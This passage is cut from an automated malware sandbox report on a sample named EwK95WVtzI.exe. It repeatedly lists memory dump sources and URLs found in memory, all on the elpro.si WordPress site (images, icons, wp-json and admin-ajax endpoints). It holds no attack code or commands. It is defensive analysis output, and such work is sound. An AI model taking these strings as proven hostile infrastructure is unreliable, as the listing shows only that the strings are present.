EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-admin/admin-ajax.php
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/Elpro_E-64x64.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/Elpro_E.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Analiza-plinov.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Kalibracija.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Nivo.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Regulacija.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Temperatura.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Tlak.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Vlaga.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/LOGO-Header.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ELPRO-www-00-HOME-Header-01.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ELPRO-www-00-HOME-Header-01.jpg)
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Eksplozivna-okolja.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Monitoring.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/ICO-75-Prenosne-naprave.svg
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/03/preloader.gif)
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-100x100.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-150x150.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-300x300.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-331x330.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-600x599.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-64x64.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-661x660.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy-768x767.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-25-of-25-Copy.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-100x100.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-150x150.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-300x300.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-331x330.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-600x599.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-64x64.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-661x660.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy-768x767.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2022/10/akcija-8-of-25-Copy.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/04/sl-2001-100x100.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/04/sl-2001-150x150.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/04/sl-2001-300x300.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-100x100.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-150x150.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/07/PRENOSNA_2220-9670-asfalt_asvalt_moder-300x300.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-1170x658.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-1536x864.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-2-1170x658.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-2-1536x864.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-2-355x200.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-2-585x330.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-2-600x338.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-2-64x36.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-2-768x432.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-2.jpg
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-355x200.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-585x330.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-600x338.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-64x36.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok-768x432.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/09/Kalibracija-in-kalibracijski-rok.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/10/Kalibracija-in-kalibracijski-rok-1-1170x658.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/10/Kalibracija-in-kalibracijski-rok-1-1536x864.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/10/Kalibracija-in-kalibracijski-rok-1-355x200.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/10/Kalibracija-in-kalibracijski-rok-1-585x330.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/10/Kalibracija-in-kalibracijski-rok-1-600x338.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/10/Kalibracija-in-kalibracijski-rok-1-64x36.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/10/Kalibracija-in-kalibracijski-rok-1-768x432.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2023/10/Kalibracija-in-kalibracijski-rok-1.png
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.elpro.si%2F
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.elpro.si%2F&format=xml
